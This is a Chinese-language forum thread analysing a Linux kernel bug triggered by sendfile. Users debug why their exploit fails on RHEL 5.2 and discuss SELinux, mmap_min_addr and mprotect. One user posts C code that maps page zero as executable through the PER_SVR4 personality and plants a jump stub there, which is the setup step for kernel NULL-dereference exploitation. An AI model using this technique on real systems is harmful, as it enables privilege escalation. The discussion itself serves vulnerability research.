剖析一個由sendfile引發(fā)的linux內核BUG

Godbach

原帖由 W.Z.T 于 2010-1-16 20:36 發(fā)表


標準內核是在2.6.26以后才被加進selinux里， redhat的系統(tǒng)不是標準內核， 估計他們打了相關的補丁。

哦，那就是了。我測試的三個RHEL環(huán)境中，有一個用的是安裝的系統(tǒng)自帶的內核，應該是RH打過補丁的。另外兩個都是我自己編譯的2.6.18.3的內核。就算開啟了SElinux，應該也不會有這個變量。

T-Bagwell

原帖由 Godbach 于 2010-1-16 21:42 發(fā)表


對，默認安裝和啟動了SElinux，后來關閉的。

不過感覺我的幾個環(huán)境有點區(qū)別，都是RHEL5.2，開始裝的是都應該啟動了SElinux，但是兩個測試環(huán)境中都沒有了mmap_min_addr文件

看看config文件里面是不是帶了CONFIG_DEFAULT_MMAP_MIN_ADDR

Godbach

你安裝的系統(tǒng)是默認安裝和啟動了selinux吧， 安裝selinux就會在/proc目錄下有mmap_min_addr文件。 關閉selinux之后這個還是應該存在的吧， 只是失效了而已。

WZT兄，我在我的測試環(huán)境中，默認用了RHEL5.2的內核，禁用了Selinux之后，重啟系統(tǒng)，mmap_min_addr文件還存在，可以如你說的應該失效了。
執(zhí)行getenforce得到的結果也是：Disabled。

然后執(zhí)行exp的程序，就是那個run.sh，出錯信息和我之前貼出的一樣：

mprotect： Cannot allocated memory

也就是mprotect這個函數沒有執(zhí)行成功。

Godbach

原帖由 T-Bagwell 于 2010-1-16 22:00 發(fā)表

看看config文件里面是不是帶了CONFIG_DEFAULT_MMAP_MIN_ADDR

沒有帶這個

T-Bagwell

1. 
   
2. 222 config DEFAULT_MMAP_MIN_ADDR
   
3. 223         int "Low address space to protect from user allocation"
   
4. 224     depends on MMU
   
5. 225         default 4096
   
6. 226         help
   
7. 227       This is the portion of low virtual memory which should be protected
   
8. 228       from userspace allocation.  Keeping a user from writing to low pages
   
9. 229       can help reduce the impact of kernel NULL pointer bugs.
   
10. 230
    
11. 231       For most ia64, ppc64 and x86 users with lots of address space
    
12. 232       a value of 65536 is reasonable and should cause no problems.
    
13. 233       On arm and other archs it should not be higher than 32768.
    
14. 234       Programs which use vm86 functionality or have some need to map
    
15. 235       this low address space will need CAP_SYS_RAWIO or disable this
    
16. 236       protection by setting the value to 0.
    
17. 237
    
18. 238       This value can be changed after boot using the
    
19. 239       /proc/sys/vm/mmap_min_addr tunable.
    
20. 
    

復制代碼

會不會和這個有關系呢

W.Z.T

原帖由 Godbach 于 2010-1-16 22:15 發(fā)表

WZT兄，我在我的測試環(huán)境中，默認用了RHEL5.2的內核，禁用了Selinux之后，重啟系統(tǒng)，mmap_min_addr文件還存在，可以如你說的應該失效了。
執(zhí)行getenforce得到的結果也是：Disabled。

然后執(zhí)行exp的程序， ...

我這沒有as5.2的內核， 你可以再在自己build的2.6.18.3系統(tǒng)上測試下exp程序， 如果成功了， 說明as5.2的系統(tǒng)打了什么補丁禁止mprotect的修改了。 我猜測的


BTW: 我在as5.4下都能修改成功。

mmap.c

1. 
   
2. #include <stdio.h>
   
3. #include <stdlib.h>
   
4. #include <string.h>
   
5. #include <sys/personality.h>
   
6. #include <sys/mman.h>
   
7. #include <errno.h>
   
8. 
   
9. void test_code(void)
   
10. {
    
11.         printf("We are mmapped in zero memory!\n");
    
12. }
    
13. 
    
14. int mmap_zero_memory(void)
    
15. {
    
16.         void *mem;
    
17. 
    
18. 
    
19.         if ((personality(0xffffffff)) != PER_SVR4) {
    
20.                 mem = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE| PROT_EXEC,
    
21.                         MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    
22.                 if (mem == MAP_FAILED || mem != NULL) {
    
23.                         fprintf(stderr, "[+] Try fix mmap prot.\n");
    
24.                         mem = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE,
    
25.                                 MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    
26.                         if (mem == MAP_FAILED || mem != NULL) {
    
27.                                 fprintf(stderr,
    
28.                                         "[-] Unable mmap to zero memory.\n");
    
29.                                 return -1;
    
30.                         }
    
31.                 }
    
32.                 if (mem == NULL) {
    
33.                         fprintf(stderr, "[+] Mmap to zero memroy.\n");\
    
34.                 }
    
35.         }
    
36.         else {
    
37.                 if (mprotect(0x0, 0x10, PROT_READ | PROT_WRITE | PROT_EXEC)
    
38.                         == -1) {
    
39.                         perror("mprotect");
    
40.                         fprintf(stderr, "[-] Unable mmap to zero memory.\n");
    
41.                         return -1;
    
42.                 }
    
43.                 fprintf(stderr, "[+] Mprotect zero memroy success.\n");
    
44.         }
    
45. 
    
46.         *(char *)0 = '\x90';
    
47.         *(char *)1 = '\xe9';
    
48.         *(unsigned long *)2 = (unsigned long)&test_code - 6;
    
49. 
    
50.         return 0;
    
51. }
    
52. 
    
53. int main(void)
    
54. {
    
55.         mmap_zero_memory();
    
56. }
    

復制代碼

run.c

1. 
   
2. #include <sys/personality.h>
   
3. #include <stdio.h>
   
4. #include <unistd.h>
   
5. 
   
6. int main(void) {
   
7.         if (personality(PER_SVR4) < 0) {
   
8.                 perror("personality");
   
9.                 return -1;
   
10.         }
    
11. 
    
12.         fprintf(stderr, "set personality PER_SVR4 successful.\n");
    
13. 
    
14.         execl("./mmap", "mmap", 0);
    
15. }
    

復制代碼

run.sh

1. 
   
2. #!/bin/sh
   
3. 
   
4. gcc -o run run.c && \
   
5. gcc -o exploit exploit.c && \
   
6. ./run
   

復制代碼

[ 本帖最后由 W.Z.T 于 2010-1-17 11:36 編輯 ]

Godbach

我這沒有as5.2的內核， 你可以再在自己build的2.6.18.3系統(tǒng)上測試下exp程序， 如果成功了， 說明as5.2的系統(tǒng)打了什么補丁禁止mprotect的修改了。 我猜測的

多謝，應該是這個原因。我自己編譯的內核版本用了2.6.18.3的，開不開啟SElinux都可以exp的。

Godbach

231       For most ia64, ppc64 and x86 users with lots of address space
232       a value of 65536 is reasonable and should cause no problems.

嗯，裝完RHEL 5.2，這個值默認就是65536

W.Z.T

原帖由 Godbach 于 2010-1-17 11:24 發(fā)表

嗯，裝完RHEL 5.2，這個值默認就是65536

看我重新編輯過的帖子， 可以在 as5.4下修改0地址屬性。 針對2.6.26以前的系統(tǒng)exploit有2個方案來映射0地址內存， 設置PER_SRV4后， 就可以用mrptect來修改0地址屬性了， 因此跟selinux開不開都沒啥關系了吧， 更跟mmap_min_addr這個東西有沒有關系了吧。 另外 2.6.18的內核mrptect也是允許修改0地址屬性的。

1. 
   
2. asmlinkage long
   
3. sys_mprotect(unsigned long start, size_t len, unsigned long prot)
   
4. {
   
5. ...
   
6.         else {
   
7.                 if (vma->vm_start > start)
   
8.                         goto out;
   

復制代碼

設置完PER_SRV4后， 內核在加載elf文件的時候， 自動把0地址的空間映射到用戶進程上了， 所以start是0的話， 是可以滿足條件的。

[ 本帖最后由 W.Z.T 于 2010-1-17 11:59 編輯 ]

Godbach

多謝WZT兄的詳細解釋。這個應該印證了我用標準的2.6.18編譯之后可以exp的原因。

另外，為什么那個程序還要分出來一個run.c呢。他也就是設置一下PER_SVR4。不可以合并到同一個文件里嗎？